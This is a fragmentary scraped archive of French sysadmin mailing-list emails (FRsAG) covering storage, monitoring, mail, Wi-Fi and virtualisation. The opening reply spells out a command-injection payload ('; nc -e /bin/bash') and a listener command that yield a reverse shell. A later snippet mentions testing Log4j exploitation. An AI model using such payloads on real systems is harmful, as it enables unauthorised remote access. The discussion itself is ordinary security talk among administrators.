Hello,
au vu du morceau de php indiqué, il suffit d'envoyer le formulaire avec
:
; nc -e /bin/bash
du côté attaquant lancer :
$ nc -lvp
Et voilà un reverse shell simpliste qui contourne l'auth ssh.
--
Julien.
Le 01/05/2024 21:33, Ludovic LEVET via FRsAG a écrit :
Heu
chose en console, non ?
Tu lances ta commande dans un screen puis tu dettaches le screen
(ctrl-A d) et tu te deloggues.
Apres il y a aussi un lock dans screen (ctrl-A x). Mais je ne sais pas
si on peut le contourner (e.g. dettacher le screen) pour recuperer un
shell.
a+,
--
Julien
<< Vous n'avez rien a dire... Parlons-en! >>
___
Liste de diffusion du %(real_name)s
http://www.frsag.org/
) ?
Dans l'idéal même, un accès à l'iLO/IPMI/whatever depuis mon IP fixe et
je me démerde pour tout déployer.
En bonus, je promets qu'on ne m'entendra pas en support (hors panne
matérielle).
Merci et bonne fin de journée !
Julien
OpenPGP_signature
Description: OpenPGP digita
uellement même par outlet mais
les iLO, IPMI et consorts donnent la conso en SNMP maintenant, mais le
switched, c'est un no-go absolu maintenant.
On est revenus à la logique qu'un PDU, c'est une multi-prise, point
barre. L'intelligence est ailleurs.
Julien
___
s les jours, beaucoup de tests, beaucoup
de sondes (donc de perf)
- monitoring externe : figé, stable, sondes basiques, minimaliste en
ressources
Notre gros point noir pour bouger sur d'autres solutions que Icinga,
c'est l'alerting. Je cherche toujours la bonne option pour ça.
Juli
Beaucoup d'alternatives citées ici sont aussi payantes 😉 (powermail,
infomaniak...)
--
Julien
Le 04/02/2022 à 02:28, Clément Gineste a écrit :
Quitte à payer autant prendre du Workspace et profiter du Drive non ? :D
Le ven. 4 févr. 2022 à 00:16, Julien a écrit :
Tu es prêt à pr
Tu es prêt à prendre du payant pour l'antispam?
J'ai testé Altospam et ça fonctionne super bien, tu peux avoir la main
(pas directement) sur les règles etc et tu as une interface de suivi
Par contre c'est pas intégré au serveur mail, ça se met en coupure.
--
Julien
Le 03/
trasbourg, j'aurais mieux fait de pisser dans un violon.
Bon courage,
Julien
Le 16/01/2022 à 16:29, Juan Isoza a écrit :
>
> Bonjour,
> J'ai des problèmes d'envoi de mail avec deux domaines, suivant l'OS
> des serveurs.
>
> Je reproduit le problème de nég
amalgames sont notre lot quotidien
désormais.
Julien
Le 13/01/2022 à 11:44, Romain a écrit :
___
Liste de diffusion du %(real_name)s
http://www.frsag.org/
lecte de données dans les préférences
(et non pas désactiver http3 comme certains le suggèrent).
julien
___
Liste de diffusion du %(real_name)s
http://www.frsag.org/
compte de ces deux aspects.
> Sur mes serveurs, j'ai eu des tentatives d'attaques (logs web) depuis
> le 10 décembre.
Oui, même chose. De même, j'ai plusieurs milliers de tentatives de brute
force SSH chaque minute sur les serveurs pour lesquels ce n'est pas
firewallé. Ce n'est pas pour autant que je fais ma drama-queen sécuritaire.
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
ouché
Unifi est touché à priori mais je n'ai pas réussi à l'exploiter avant de
passer -Dlog4j2.formatMsgNoLookups=true
Si quelqu'un veut un test d'exploitation sur un service vulnérable, j'ai
un bout de script qui se contente de faire un 'touch /tmp/pwned'
Bon
err)
>
> commande >/dev/null 2>&1
> -> ok (je vois plus rien)
en fait le "2>&1" signifie de rediriger stderr vers la ou pointe stdout.
Donc il faut d'abord faire pointer stdout vers null (> /dev/null)
avant de dire a stderr d'aller vers
ois pour faire ta
bascule et générer un certificat qui se renouvellera automatiquement
ensuite (par HTTP-01 comme tu sembles vouloir le faire).
Julien
OpenPGP_signature
Description: OpenPGP digital signature
___
Liste de diffusion du FRsAG
http://www.frsag.org/
sympa.
--
Julien
Le 17/08/2021 à 15:30, Alain Bieuzent a écrit :
Bonjour la liste.
Je commence à avoir pas mal de scripts de part et d’autre à lancer
régulièrement. Jusqu'à maintenant les crontab nous suffisait, mais on
commence à ne plus y voir très clair.
La très grande majorité des sc
e réseau au premier boot.
Et sinon, sur la manip, comme indiqué par les co-listiers : reboot avec
un livecd (type sysrescd) et dd du disque au travers de
SSH/Rsync/whatever vers ton hôte de virtu. Ca prend du temps, de la
place mais c'est le plus safe.
Julien
OpenPGP_signatur
Le 28/06/2021 à 10:20, François Poulain a écrit :
> Coucou,
>
> Le Mon, 28 Jun 2021 09:40:50 +0200,
> Julien Escario a écrit :
>
>> Je suis surpris du peu de contributions : question mal posée ou nous
>> sommes aussi peu à poser ces problématiques sur la table ?
> Mo
Le 28/06/2021 à 10:04, Jeremie Le Hen a écrit :
> Salut,
>
> On Mon, Jun 28, 2021 at 09:40:50AM +0200, Julien Escario wrote:
>> Ok, merci du retour. On va faire un test de PagerDuty du coup. Mais
>> dépendre d'un service tiers, aussi fiable soit-il, me gêne quand même
>
métriques de Telegraf.
C'est exactement mon soucis. En plus de consommer de la ressource pour
récupérer deux fois le même métrique : BP, CPU, etc ...
Je suis surpris du peu de contributions : question mal posée ou nous
sommes aussi peu à poser ces
erduty
B) un insomniaque dans l'équipe
C) la réponse D
Merci d'avance pour votre partage !
Julien
[1]
https://play.google.com/store/apps/details?id=info.degois.damien.android.aNag
___
Liste de diffusion du FRsAG
http://www.frsag.org/
publique, vous ne pouvez pas dire
à un client que vous ne pouvez pas faire tourner son applicatif parce
qu'il est sous l'OS X ou Y.
Merci pour vos lumières,
Julien
OpenPGP_signature
Description: OpenPGP digital signature
___
Liste de diffusion du FRsAG
http://www.frsag.org/
t Microsoft derrière les deux.
>
Tiens, intéressante cette remarque : tu considères que Linux est porté
majoritairement par Microsoft maintenant ? Tu aurais des pointeurs pour
étayé ça stp ?
Julien
OpenPGP_signature
Description: OpenPGP digital signature
___
Liste de diffusion du FRsAG
http://www.frsag.org/
publique
en ne faisant que du Linux. Windows, c'est quelques VMs qui traînent ici
et là pour un rôle AD ou RDS mais pas sur l'infra 'core'.
Ceux qui ont déjà payé des licences Windows DC pour faire de l'Hyper-V
ont vite compris la douleur.
Julien
OpenPGP_signature
Des
Le 25/03/2021 à 16:03, Daniel Caillibaud a écrit :
> Le 25/03/21 à 14:05, Julien Escario a écrit :
>> Le 25/03/2021 à 13:38, Daniel Caillibaud a écrit :
>>> Bonjour,
>>>
>>> Y a-t'il un moyen propre d'avoir un login shell qui dépendent de la clé ssh
> Si y'a une solution ça m'intéresse ;-)
>
> Sinon c'est pas très grave, y'a d'autres solutions comme
> - mettre zsh par défaut pour tous les users (qui ont un shell), un peu
> extrémiste… (mais je
> suis quasi le
u quatre ne change rien, si ce n'est dans la
provision des disques pour éviter d'arriver à 100% d'occupation en cas
de rebalance à la suite de la perte d'un nœud.
Merci !
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
#x27;apport en
fonctionnalités de Ceph est quand même un gros plus par rapport à mdadm
ou ZFS.
Maintenant, est-ce que d'après vous j'ai loupé un truc dans le setup ou
est-ce que c'est réellement viable ? (en dehors du fait que c'est un
gros hack par rapport à ce pourquoi Ceph est prévu).
Merci,
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Bitwarden est bien mais y'a quelques limitations dans la version gratuite pour
la gestion par équipe.
Y'a une alternative avec la meme interface web mais le coeur réécrit qui n'a
pas ces limitations, bitwarden_rs.
Pour ldap y'a ca :
https://github.com/dani-garcia/bitwarden_rs/wiki/Syncing-users-
ntre vous
ont-ils un avis ?
Note : ca ferait l'objet d'un magnifique tuto si ça fonctionne.
Merci,
Julien
Le 18/09/2020 à 14:00, Richard DEMONGEOT a écrit :
> Bonjour,
>
> Le 2020-09-18 13:48, Stéphane Rivière a écrit :
>>> Ceph c'est bien à partir de 4 noeuds pour être
sur X bytes (ce qui arrivait au bout
d'environ 3 ans d'uptime) en version ... 3 (si ma mémoire est bonne).
La solution, c'était bien DDR (ou patch du bout de code Perl qui gérait
ça + restart pvemanager).
Julien
___
Liste de di
G_MZ7LH960HAJR-5_S45NNE0N232919-part3 ONLINE 0
0 0
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
rtain ?
>
> https://git.proxmox.com/?p=pve-installer.git;a=commit;h=e1b490865f750e08f6c9c6b7e162e7def9dcc411
Très juste, je suis resté sur une idée fausse alors. Vérification faite
sur des HV créés cet été, c'est effectivement /dev/disk/by-id/ (et
t ?
En partant du principe que chaque VM a ses propres objects (aka blocks)
: je ne vois pas pourquoi il y aurait plus grave comme soucis qu'un
resync au moment où le réseau revient ?
En quoi le quorum est-il critique dans ce cas ?
Je n'ai pas osé le test
urs /dev/sdX au lieu de /dev/disk/by-id/ (ou (by-uuid
pour les intrépides).
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
CVS (via Vulners)
Et tu peux déclencher les mises à jour depuis la console Zabbix, pas
paquet ou par serveur.
--
Julien
Le 18/09/2020 à 13:40, Jonathan Leroy - Inikup via FRsAG a écrit :
(Cross-post sur FRsAG, du coup).
Hello,
Katello / Satellite / Landscape c'est plus de la gestion de
que tu as fais ça, ça commence à devenir plutôt complexe pour
le script-kiddie de forger un mail valide.
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
e trouve mon sysctl.conf a
même été écrasé depuis.
Donc la gestion de la VM (au sens virtual memory) a dû largement évoluer
entre un kernel 4.x et 5.x. Le contraire serait étonnant d'ailleurs
(merci Captain Obvious).
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
gt; compiler à la mano (c'est pas la panacée...)
Mon conseil non-demandé du jour : vire DRBD/Linstor et passe sur Ceph.
Ma vie a changée depuis que j'ai fait ça.
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
ne bière à ceux que l'e-mail aura offensé en guise d'excuse.
Navré et merci,
Julien
Le 25/07/2020 à 15:40, Julien Escario a écrit :
> Bonjour !
> Alors, ce n'est pas le moment idéal pour voir tous les détails mais je
> tombe sur le mail donc je réponds dans la foulée.
[...]
_
ure,
donc peu de grille de tarif chez nous.
A votre disposition pour en discuter lundi de vive voix. Je suis
joignable au 06 77 58 31 99 ou 03 74 39 10 21.
Bon week-end !
Julien Escario
Le 24/07/2020 à 16:51, Jonathan Leroy - Inikup via FRsAG a écrit :
> (Il est conseillé de lire cet email avec la vo
faisait merder complètement le NDP.
Je n'ai pas cherché les détails, j'ai juste tout viré et pouf, nickel
depuis.
Donc on a un consensus sur le fait qu'ils sont allé trop loin : network,
ntp, dns, ...
Du coup, on se retrouve à mettre en place des astuces pour EVITER
d'
Est-ce qu'il existe un équivalent au MySQL Router pour Galera ou
finalement le front HAProxy est la solution la plus simple?
Le 25/06/2020 à 08:26, Nicolas GIRARDI a écrit :
Bonjour,
En effet il est conseillé d’écrire sur un seul des noeuds du cluster.
L’approche avec un HaP pour f
le mieux pour ça est de jouer sur une redondance au niveau
applicatif (facile si c'est du web, parfois complexe sur d'autres payloads).
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
t un étage de plus mais beaucoup d'emmerdes en moins avec une
gestion centralisée des clés.
Et SMTP, c'est plutôt costaud niveau résilience/failover donc si le MTA
de signature se casse la gueule, c'est facile de faire sortir par ailleurs.
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Salut,
Bugtracking ou helpdesk?
Cdlt,
Julien
Le 19/02/2020 à 18:28, SERRUT Arnaud a écrit :
Bonjour la liste.
Nous sommes arrivés à un point chez notre client où notre outil de
gestion de ticket va être arrêté par le client.
Jusqu'à présent on utilise un projet Jira, nature
'ailleurs : chouette projet très utile, mais ne vous
faites pas d'illusion, ça va merder techniquement ou politiquement un jour ou
l'autre.
Allé, bon trollday à toutes et à tous (je ne perds pas espoir que notre métier
se féminise davantage),
Julien
Le 08/12/2017 à 09:14, fr...@jack.fr
r
contre, en terme de divulgation d'infos, ça...)
Ca par contre, c'est non. Pas la peine d'argumenter, je vire direct les
mecs de mon équipes qui font encore ça en 2017.
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
t; lisible ici cela dit: https://www.ruby-forum.com/topic/4412511)
OK, clair net et précis : no-go :-( Le petit espoir que la situation aie changée
depuis vient de s'éteindre dans un râle d'agonie.
> Je suppose que les choses n’ont pas évolué depuis. Bonne config de HAProxy !
C&#
de ne pas
multiplier les produits (et les compétences).
> Fortinet a un load balancer (FortiADC) qui fait du SSL offload et supporte
> SNI.
>
> Ca existe au format virtuel.
Une boite noire, très peu pour moi. J'aime autant investir du temps pour
maîtriser HAProxy.
Julien
__
dovecot.org/SSL/SNIClientSupport pour avoir une idée
du support en IMAP.
Est-ce que quelqu'un s'est déjà lancé dans ça ? Avec du succès ou pas ?
Merci d'avance !
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Bonjour,
Exactement le même problème chez certains clients. Le fait de désactiver les
VMQ avait solutionné le problème.
Envoyé de mon iPhone
> Le 22 nov. 2017 à 07:12, Guillaume DESNOUES
> a écrit :
>
> Bonjour,
>
> On a eu un problème sur une conf équivalente (sauf carte réseau en Team):
On Tue, Oct 10, 2017 at 11:30:29AM +0200, Jonathan Leroy wrote:
> Le 10 octobre 2017 à 11:26, Michael FROMENT
> a écrit :
> > je pense que racktables doit repondre a ton besoin.
>
> J'ai regardé rapidement, mais ça m'a l'air plus orienté réseau que système.
> Et je ne vois pas de notion de client
gt; réjouis. :)
Une source ? Je ne trouve rien.
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Le 13/09/2017 à 14:29, Arnaud Launay a écrit :
> Après, si Thawte propose un EV wildcard, je l'ai pas trouvé sur
> leur site...
PERSONNE ne fait de EV Wildcard. Ce serait bien trop dangereux en terme de
sécurité.
Julien
smime.p7s
Description: Signature cryptograph
n
planning d'astreinte et l'ipbx fait un appel à une URL pour savoir à qui il doit
renvoyer la patate chaude. On a pas poussé jusque là mais c'est dans les tuyaux
parce que l'équipe de support s’agrandit tout doucement et on commence à avoir
des oublis sur
a compétence pour monter son infra. On l'a même
fait pour des clients tellement on est pas sectaires.
Après, on sait aussi faire du service 'à la VM' mais je vais éviter le
bullshit marketing, c'est pas mon trip.
Julien
___
Liste de diffusion du FRsAG
http://www.frsag.org/
distribué, auto-scalable pour les VM QEMU.
Très curieux aussi. Je voulais faire un test drive mais le manque de maturité
évident m'avait bien refroidit d'y passer 2/3 jours.
Le projet n'a pas l'air vivace mais quand même quelques commit. Maitenant, tout
sem
, il y a des setups bien plus touchys que ceux qu'on fait nous : avec
du RDMA en IPoIB par exemple. Linbit a pas mal bossé là dessus semble t'il et
quand les perfs comptent vraiment, ça doit pouvoir suivre (d'après la comm de
Linbit, hein !).
La vache, chu
u alors avec une bidouille à base de parité à la RAID5 pour 3+ replicas.
Moui, ça pourrait être fun comme concept mais casse gueule quand on parle de
stockage réseau.
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Le 30/06/2017 à 11:28, Corentin BONNETON a écrit :
> Bonjour
>
>> Le 30 juin 2017 à 10:51, Julien Escario a écrit :
>>
>> Le 24/06/2017 à 17:57, Fabien a écrit :
>>> Bonjour la liste,
>>>
>>> J'ai une question théorique concerna
tockage à chaud dans Proxmox, tu peux basculer de NFS (lent) à
DRBD (plutôt rapide, dépend de la latence et des disques) et les migrer sans
shuter tes VMs le jour où ça commence à merdoyer (par exemple, si ta synchro
DRBD est H.S. sur un noeud).
My 2 cts,
Julien
smime.p7s
Description: Si
Le 05/05/2017 à 18:05, Julien Escario a écrit :
> Et un strace bloque sur :
> stat("/dev/drbd106", {st_mode=S_IFBLK|0660, st_rdev=makedev(147, 106), ...})
> = 0
> open("/dev/drbd106", O_RDONLY|O_DIRECT|O_NOATIME) = 4
> fstat(4, {st_mode=S_IFBLK|0660, st_rdev=mak
On Thu, Jun 08, 2017 at 11:32:49AM +0200, Jean-Louis Danthine wrote:
> je ne connais pas tous tes besoins mais pour nous jobscheduler fonctionne
> très bien (http://www.sos-berlin.com/jobscheduler)
Personnellement j'en ai aucun et si j'avais des besoins je partirais sans doute
vers
rundeck.
--
On Thu, Jun 08, 2017 at 09:33:18AM +0200, Alarig Le Lay wrote:
> On mer. 7 juin 20:57:42 2017, Luc Didry wrote:
> > Moi j'utiliserai Salt ou Ansible pour gérer les cron des machines ou
> > exécuter
> > des commandes dessus.
>
> Je suis tout à fait d’accord. Pourquoi s’embêter avec des trucs chel
n pour voir si ça s'ouvre avec Thunderbird (ce dont je doute FORTEMENT).
Encore mieux : vous avez un truc dans les standards qui ajoute cette
fonctionnalité au mail ? (je vois mal comment dans un périmètre autre que de la
messagerie interne).
Merci et bonne
Bonjour,
Avec un peu de retard, je tenais à remercier Antoine pour son récapitulatif
vraiment complet et précis !
Je crois que le tour de la question est fait, les perspectives en plus.
Encore merci Antoine,
Julien
Le 23/05/2017 à 14:40, Antoine BOISJIBAULT a écrit :
> Bonj
'il n'existe pas vraiment de solution
'propre' dans l'immédiat, avec quelques pistes pour le futur.
On va continuer à bricoler quelques mois alors.
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
ste une question d'arbitrage).
Mon soucis c'est que le SSL s'est clairement démocratiser (et tant mieux) et
tout porte à croire que ça va continuer.
On a notamment des utilisateurs qui n'utilisent le wifi que pour faire du
Netflix = grosse bande passante, jamais de trafic en cla
ais la RFC1170, c'est statut proposal. Le temps que ce soit validé ET ajouté
par les équipementiers, l'IoT aura déjà tué Internet.
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
C'est moche et ça donne de
mauvaises habitudes aux end-users (si le mal n'est pas déjà fait).
C'est cette problématique que je tente de contourner. Si, en bonus, on a une
solution qui permet d'éviter d'ouvrir des AP sans WPA, j'avoue que je ne
cracherais pas dessus.
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Le 22/05/2017 à 12:31, Laurent a écrit :
> Le 22/05/2017 à 12:15, Julien Escario a écrit :
>> Bricoler avec du DNS menteur ?
>
> C'est ce que font les McDo et autres hotels, ils me semblent..
Sauf que, si je ne me trompes pas, ca oblige à cliquer pour bypasser l'erreur d
Le 22/05/2017 à 14:07, Jonathan Leroy a écrit :
> Le 22 mai 2017 à 12:15, Julien Escario a écrit :
>> * 802.1X : pas trop compris si ça permet de satisfaire aux exigences légales
>> françaises ni même si c'est réaliste en terme de mise en œuvre.
>
> 802.1X est utilisé
qui semble prometteur mais qui n'avance pas en terme d'implémentation.
* 802.1X : pas trop compris si ça permet de satisfaire aux exigences légales
françaises ni même si c'est réaliste en terme de mise en œuvre.
Merci pour vos lumières,
Julien
smime.p7s
Description: Signature cryptog
Le 05/05/2017 à 17:03, Dominique Rousseau a écrit :
> Le Fri, May 05, 2017 at 04:55:16PM +0200, Julien Escario [esca...@azylog.net]
> a écrit:
> [...]
>>
>> En revanche, en terme de symptômes, je n'ai aucun retour de pvdisplay,
>> lvdisplay, vgdisplay ou lvs.
&g
i marche plutôt bien et quand ça coince un peu, on s'en sort
avec drbdadm et drbdsetup).
Je n'ai pas l'impression que DRBD soit en cause. C'est plutôt un symptôme.
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Quelqu'un a déjà eu des symptômes similaires ? Voir une solution ? A priori, un
reboot réglerait mon soucis mais c'est un hyperviseur. Et justement, la live
migration ne fonctionne plus à cause de ça (ce qui est le fond du problème
justement).
Merci et bon week-end,
nginx ->
fpm pour faire du cache, je n'y avais pas pensé.
Après, il faut voir si avec l'opcode Zend de PHP7, le gain est encore
significatif. Pas sûr ...
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Le 05/04/2017 à 16:15, Jonathan Leroy a écrit :
> Le 5 avril 2017 à 15:00, Julien Escario a écrit :
>> Bonjour,
>
> Salut,
>
>
>> Un de nos clients va 'passer à la télé'. Aujourd'hui, il a une petite
>> boutique
>> basée sur Prestashop.
r comment ça a
> été et ce que tu as prit comme solution.
Ben ca dépend aussi de ce que le client est prêt à mettre hein. Parce qu'il fuit
déjà quand je parle de 1500 € de setup pour tout ça.
Comme un con, avec la deadline et comme je n'aime pas bosser en urgen
ute les images etc
> sur le CDN toi tu ne gère que les infos de base ?
Parce que je n'ai pas de soucis avec le statique ...
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
périence qu'ils ont fait là, merci.
> en gros, prévoir une stratégie qui intègre de la souplesse mais aussi
> la possibilité de couper certaines fonctionnalités (qui sera à mon
> humble avis mieux perçu qu'une erreur 500 :) )
Tout est mieux qu'une page 500 ;-)
Julien
e
proxy et après optimisation rapide du tout, je tiens 50 req/s.
Le MariaDB se touche un peu donc j'imagine qu'en multipliant les backends, je
peux pousser encore pas mal (~ x4).
Le gros de la base Prestashop est InnoDB d'où le choix de MariaDB pour avoir
XtraDB. J'avoue que ç
nvoi juste le flux
> d’origine vers eux.
Merci mais ce n'est pas de la video que l'on pousse, c'est du e-commerce.
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
simple (et magique !) à mettre en œuvre avec juste un changement DNS ou
peu plus. Bref, qui tienne dans le délai qu'il nous reste.
Merci pour vos lumières !
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Le 02/11/2016 à 12:55, Wallace a écrit :
> Salut Julien,
> Il faudrait plus d'infos, dur de t'aider dans ton cas.
> De notre côté on fait des serveurs NFS ipv6 only depuis 7/8 ans sous
> Debian RAS en VM ou physique.
> Les montages sont pas IP par contre, on avait eu des s
Le 26/10/2016 à 12:50, Julien Escario a écrit :
> Bonjour,
> J'essaie de faire fonctionner un backup de VM sur un export NFS. Après
> quelques
> galères sur la configuration du sharenfs en ipv6, ça monte bien.
>
> L'hyperviseur est mono-stack ipv6.
>
>
> S
es patchs kernel compilés pour sa
version. On revient au make kpkg ?
Julien
Le 31/10/2016 à 12:33, remy.dernat a écrit :
> Comme une petite "bash bomb" connue qui se fork en permanence.
>
> http://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
>
> Pour le upti
27;iowait et le load.
Je n'ai pas ce comportement en ipv4.
L'hyperviseur est Proxmox 4.2.
Une idée ? Y'a des bugs connus entre nfs et ipv6 ?
Merci,
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Le 26/10/2016 à 11:17, Julien LEQUEN a écrit :
> Moi beaucoup moins bien.
>
> Julien
>
Ah oui mais non, mon exemple portait sur un serveur qui est censé livrer des
zolis sites oueb à Mme Michu.
C'était exim qui s’excitait, on l'a calmé.
Masser du thread sur sa machine en
top - 10:02:48 up 3 days, 13:51, 1 user, load average: 615.47, 582.00, 603.97
Tasks: 1957 total, 1 running, 1946 sleeping, 0 stopped, 10 zombie
Cpu(s): 12.1%us, 12.6%sy, 0.0%ni, 0.0%id, 75.1%wa, 0.1%hi, 0.1%si, 0.0%st
Et ça tourne ... (bon ok, c'est mou).
Julien
smim
avec ZFS
c'est que tant que n'y touche pas et que ça ne se remplit pas, ça juste marche.
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Le 18/10/2016 à 11:05, Julien Escario a écrit :
> Donc j'ai plusieurs options :
> 1) smartctl -l scterc,70,70 /dev/disk/by-id/wwn-0x50014ee208b4df37 (le disque
> à
> moitié H.S.)
> 2) Débrancher physiquement le disque fautif de la machine (ou tout autre
> équivalent potenti
Le 24/10/2016 à 11:28, Julien Escario a écrit :
> Sauf erreur, le but est de "décollé" l'acide qui a tendance à cristalliser sur
> les parois et les électrodes de la batterie.
Rhaaa, ca pique ... décollER bien sûr. My bad.
smime.p7s
Description: Signature c
étanches, l'eau s'évaporait et le
phénomène était bien plus flagrant. Il fallait remettre un peu d'eau de temps à
autre et secouer "fort fort fort".
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
croisant les doigts pour que ça ne foire pas totalement dans
l'intervalle et je testerais les solutions dans l'ordre.
Je vous redis ça dans quelques jours.
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
prendre DES PLOMBES à tout remettre, sans compter la période de fonctionnement
sans backup 'sec'.
Merci pour vos lumières,
Julien
smime.p7s
Description: Signature cryptographique S/MIME
___
Liste de diffusion du FRsAG
http://www.frsag.org/
. Et nhésitez pas si vous voulez davantages
dinformations.
Julien.
___
Liste de diffusion du FRsAG
http://www.frsag.org/
Le 16/09/2016 à 12:52, Un a écrit :
> Le 09/16/16 à 12:30, Julien Escario a écrit :
>> Bonjour,
>> Pour une obscure raison, je dois autoriser un utilisateur MySQL à se
>> connecter
>> depuis n'importe quelle ipv6.
>>
>> Donc, tout content, je mets
x27;authentification en ipv6.
Il y a une astuce pour faire du wildcard ipv6 avec MySQL ? A priori, je suis le
premier couillon sur terre à vouloir faire un truc pareil (la plupart des choses
que j'ai trouvées demandent comment désactiver l'écoute ipv6).
Merci !
Julien
sm
Salut,
Moi j'ai un soucis mais ça me fait chier de prendre le temps de
l'expliquer. J'aimerais qu'un spécialiste vienne dans mon bureau, passer
1/2 journée à le résoudre, le tout à ses frais.
Merci d'avance !
Julien
Le 18/08/2016 15:53, ay pierre a écrit :
Bonjour a
1 - 100 sur 382 matches
Mail list logo
